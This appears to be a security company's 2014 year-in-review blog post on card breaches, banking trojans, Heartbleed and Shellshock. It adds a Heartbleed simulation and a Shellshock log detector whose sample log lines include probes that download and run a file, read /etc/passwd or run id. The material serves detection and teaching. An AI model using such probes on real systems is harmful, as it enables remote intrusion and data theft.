While many are looking ahead to 2015, with both relief and some anxiety, we believe it's worth taking a look back at the biggest security and fraud stories of 2014. They serve as a reminder of how the fraud landscape evolved over the last twelve months and of what you should be doing to protect your business when, not if, the next security event happens.
Issued on January 2, 2014, this alert foreshadowed the months ahead. The U.S. Computer Emergency Readiness Team (US-CERT) published an alert (https://www.us-cert.gov/ncas/alerts/TA14-002A) on malware targeting Point of Sale (POS) systems, which retailers use to process consumer card transactions. While POS targeting is nothing new, the threat had clearly escalated to a level that US-CERT considered serious enough to warrant an alert. The alert offered best practices for POS system owners to protect themselves and their customers from unauthorized access, but it also acknowledged that no system is impenetrable. By proactively monitoring for indicators of compromise (IOCs), organizations can take the additional step of shutting down a threat before it results in system-wide compromise.
Continuing in the busy month of January, on January 4th we saw a dump of two million cards onto the black market, one of the largest single-day drops we had seen in a while. At the time we could not definitively identify the source of the breach, but the percentage of Extremely High Value cards was significantly higher than the average we had been seeing. The source was later confirmed as the Neiman Marcus breach.
- Heartbleed – Hackers Posting Massive Lists of Vulnerable Domains; Huge Account Takeovers Likely Over Time
Definitely one of the biggest security stories of 2014 was Heartbleed. Through the course of our own monitoring, we noticed interesting activity related to the then-new OpenSSL "Heartbleed" vulnerability (http://heartbleed.com/). Hackers were posting huge lists of 10,000+ domains that had been run through the automated web-based Heartbleed checking tools, marking each site as vulnerable, patched, or not running SSL at all. Since we still live in a world of single-factor authentication and an over-reliance on out-of-wallet questions, we predicted an increase in account takeover attacks: simply pull credentials from the memory of vulnerable servers and automatically test them against other sites. Our advice: don't be penny wise and pound foolish. Patch your systems and replace your certificates (and the private keys behind them, which the same memory leak could expose). Vulnerabilities are provable in the moment, but exploitability generally increases over time.
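To make concrete what "pulling credentials from the memory of vulnerable servers" means, here is a small model of the Heartbleed over-read and of the one-line bounds check that fixed it. This is an added example for this write-up, not code from the original post or from OpenSSL. The heartbeat record layout (RFC 6520: 1-byte type, 2-byte payload length, payload, at least 16 bytes of padding) is real; the "heap" is a constructed byte string standing in for the server's process memory, so nothing here touches a real server, and the response padding is omitted for brevity.

```python
"""
Model of the OpenSSL Heartbleed over-read (CVE-2014-0160) and the bounds check
that fixed it. Added teaching example; the HEAP_NEIGHBOUR bytes are constructed.
"""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16
HEADER_LEN = 1 + 2  # type byte + 16-bit payload length

# Constructed stand-in for whatever happened to sit after the record in memory:
# here, fragments of another client's request.
HEAP_NEIGHBOUR = (b"POST /login HTTP/1.1\r\n"
                  b"Cookie: session=8f3a9c; user=alice\r\n")


def build_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """Build a heartbeat request. claimed_len is what the header says;
    an honest client passes len(payload), an attacker passes up to 65535."""
    return (bytes([HEARTBEAT_REQUEST]) + struct.pack(">H", claimed_len)
            + payload + b"\x00" * PADDING_LEN)


def vulnerable_respond(record: bytes, heap_after: bytes) -> bytes:
    """Pre-1.0.1g behaviour: trust the claimed length and copy that many
    bytes starting at the payload. Anything past the record comes from
    neighbouring memory."""
    (claimed_len,) = struct.unpack(">H", record[1:HEADER_LEN])
    memory = record + heap_after  # the record, then whatever lies beyond it
    echoed = memory[HEADER_LEN:HEADER_LEN + claimed_len]
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack(">H", claimed_len) + echoed


def patched_respond(record: bytes, heap_after: bytes):
    """The fix: discard the record if header + claimed payload + padding does
    not fit inside the bytes actually received. Returns None on discard."""
    (claimed_len,) = struct.unpack(">H", record[1:HEADER_LEN])
    if HEADER_LEN + claimed_len + PADDING_LEN > len(record):
        return None  # RFC 6520: silently discard malformed heartbeats
    echoed = record[HEADER_LEN:HEADER_LEN + claimed_len]
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack(">H", claimed_len) + echoed


def leaked_bytes(record: bytes, heap_after: bytes) -> bytes:
    """Bytes the vulnerable server returns that were never in the request:
    everything past the real payload and its padding."""
    real_payload_len = len(record) - HEADER_LEN - PADDING_LEN
    resp = vulnerable_respond(record, heap_after)
    return resp[HEADER_LEN + real_payload_len + PADDING_LEN:]


if __name__ == "__main__":
    honest = build_heartbeat(b"ping", 4)
    print("honest request, patched reply:", patched_respond(honest, HEAP_NEIGHBOUR))

    # Claim 40 more bytes than were sent (a real exploit asks for ~64 KB).
    lying = build_heartbeat(b"ping", 4 + PADDING_LEN + 40)
    print("vulnerable server leaks:", leaked_bytes(lying, HEAP_NEIGHBOUR))
    print("patched server replies:", patched_respond(lying, HEAP_NEIGHBOUR))
```

The point of the model is the asymmetry: the honest request produces the same reply from both servers, while the lying request makes the vulnerable server hand back neighbouring memory and makes the patched one say nothing at all. Repeat the lying request often enough against a real pre-patch server and the "neighbouring memory" is session cookies, passwords in POST bodies and, eventually, the private key.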
On April 25, our research team confirmed that a massive spam campaign leveraging ZeuS GameOver was also targeting major banks, social networks, and other enterprises. Hundreds of unsolicited emails impersonating "Broad Oak Toiletries Ltd" were sent to these organizations. Once opened, the attachment attempted to download a binary from one of 55 different URLs; roughly 35 of those sites were serving the ZeuS GameOver payload together with the Necurs rootkit and a ransomware component. Unfortunately, there was little organizations could do to prevent such a campaign from being launched, since its spread was outside their control. In events like this, organizations benefit from services that monitor the black markets, so they can determine quickly whether they are an active target and shorten the time to detection and the losses from an attack.
In late May, we were greeted with news of a new banking trojan variant named Zberp. It alarmed many because it was built by combining features already in the wild from two major banking trojan families, Zeus/Zbot and Carberp. Both have been circulating for years and have been consistently improved with new attack vectors, new detection evasion, and new command-and-control mechanisms. Anti-fraud is a battle of inches, and it's an exercise in constant self-examination and criticism. A well-designed anti-fraud program, one that models multi-channel risk and the current and future effectiveness of overlapping controls, is the best way to make sure that Zeus, SpyEye, Carberp and Zberp are nothing more than a "berp", one constant yet controllable risk.
Restaurant chain P.F. Chang's China Bistro announced on August 4 that a breach of its card processing system, first reported June 12, may have resulted in the theft of customer payment card data at 33 of its 210 U.S. locations. The compromise was part of a highly sophisticated criminal operation being investigated by both the U.S. Secret Service and a third-party forensic firm. Many speculated that this breach was related to Target, but we didn't think so; there are many groups capable of performing these types of attacks.
In what had become an unusually active August, US-CERT issued an updated advisory warning that the "Backoff" Point-of-Sale malware was continuing to evolve. Following that announcement, UPS confirmed that it was the newest likely victim of Backoff. At that point US-CERT had seen five variants of Backoff, each with notable modifications, and the malware had turned up in at least three separate forensic investigations. The variants were largely undetected by AV vendors, so US-CERT recommended that, rather than relying on such protection, organizations monitor for indicators of compromise (IOCs) to determine whether they had been infected. As criminals gain greater success exploiting these systems (Target, Neiman Marcus, Michaels, etc.), they will continue to invest significant "R&D" resources into not just new variants of existing POS malware but entirely new families that can remain undetected for longer. The real key is a layered approach, which raises the cost and difficulty of stealing card data and surfaces IOCs faster and more effectively.
- Home Depot Breach: Time to Value of Black Market Cards Changes as Banks and Retailers Improve Detection
In September the latest retailer to be breached was Home Depot, which turned our attention back to the credit card black markets, the clearinghouses that sell stolen cards to the highest bidder. This new batch of cards was initially selling for $50-100 each, but prices came down faster than in the past: the window to profit from stolen cards had shrunk because financial institutions had become smarter about dealing with these attacks. The good news is that banks and retailers were responding faster and improving their detection methods, shortening the criminals' window of opportunity and reducing the exposure and hassle to consumers.
- Shellshock – BASH Exploitation Likely to Affect Large Hosting Providers and Sites, Be Used to Create Botnets
Also among the top security stories of the year was the Bash vulnerability. This one wasn't one of those insane memory corruption bugs; rather, it was a marvel of elegance and simplicity: Bash would execute commands appended to a function definition passed in an environment variable, and any service that copies attacker-controlled input into the environment (CGI scripts, for example) could be made to run them. To make matters worse, as with Heartbleed, people were aggressively scanning the entire Internet for it with massively parallel scanning tools. These tools could sweep the entire IPv4 address space very quickly and report back exactly who and what was vulnerable. In other words, criminals were already capitalizing on the bug to build networks of hacked machines (botnets). Our recommendation was to watch your logs carefully (this exploit was noisy and easily logged) and patch as soon as possible. In addition, since the first patches proved incomplete, organizations should monitor to ensure their devices are not being used to host phishing or other attacks.
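"Watch your logs carefully" is easy to say; here is what it looks like in practice. The script below is an added example, not code from the original post: it parses web server access logs in the Apache/nginx combined format and flags the Shellshock probe signature ("() {" followed by a command) in the request line, Referer and User-Agent, the three places CGI servers copy into the environment. The log lines are constructed for the example, using documentation IP ranges.

```python
"""
Detecting Shellshock probes in web server access logs. Added example; the
SAMPLE_LOG lines are constructed, not taken from a real incident.
"""
import re
from urllib.parse import unquote

# Bash treated an environment variable whose value began with "() {" as a
# function definition and kept executing whatever followed the closing brace.
# CGI servers put headers such as User-Agent and Referer, and the query string,
# straight into the environment, so the probe and the command both get logged.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;?\s*(?P<cmd>.*)")

# Combined log format: ip ident user [time] "request" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: two probes from one scanner (User-Agent, then Referer),
# one benign request, and one URL-encoded probe in the query string.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Sep/2014:10:14:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
203.0.113.9 - - [25/Sep/2014:10:14:05 +0000] "GET /index.html HTTP/1.1" 200 3412 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
198.51.100.7 - - [25/Sep/2014:10:14:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 500 0 "() { :; }; echo; /usr/bin/id" "curl/7.37.0"
192.0.2.44 - - [25/Sep/2014:10:15:01 +0000] "GET /cgi-bin/hello?x=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fcat%20%2Fetc%2Fpasswd HTTP/1.1" 404 209 "-" "python-requests/2.4"
"""


def request_path(request: str) -> str:
    """Pull the URL out of 'METHOD /path HTTP/x.y' and decode %-escapes so an
    encoded probe is matched the way the CGI would have seen it."""
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else request
    return unquote(path)


def find_shellshock(log_text: str) -> list:
    """Return one hit per log field carrying a Shellshock probe, including the
    command the attacker tried to run."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        fields = {
            "request": request_path(m["request"]),
            "referer": m["referer"],
            "user_agent": m["ua"],
        }
        for field, value in fields.items():
            probe = SHELLSHOCK_RE.search(value)
            if probe:
                hits.append({
                    "ip": m["ip"],
                    "timestamp": m["ts"],
                    "field": field,
                    "status": int(m["status"]),
                    "command": probe["cmd"].strip(),
                })
    return hits


def scanners(hits: list) -> dict:
    """Group attempted commands by source IP so repeat scanners stand out."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], []).append(h["command"])
    return by_ip


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(f'{h["ip"]} {h["timestamp"]} {h["field"]:>10} -> {h["command"]}')
```

Two practical notes. A hit with a 200 status on a CGI path is far more worrying than one with a 404, so keep the status in the output and triage on it. And a probe in your logs does not by itself mean you were exploited; the quick local check that circulated at the time, running `env x='() { :;}; echo vulnerable' bash -c "echo test"` on the host and looking for the word "vulnerable", tells you whether the Bash on that box would have honoured it.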
We hope you enjoyed our little tour down hacker memory lane. Our goal was to provide a helpful reminder of how attackers are working their way into systems, and of what you can do to shut down threats before they result in system-wide compromise and to reduce the losses from an attack.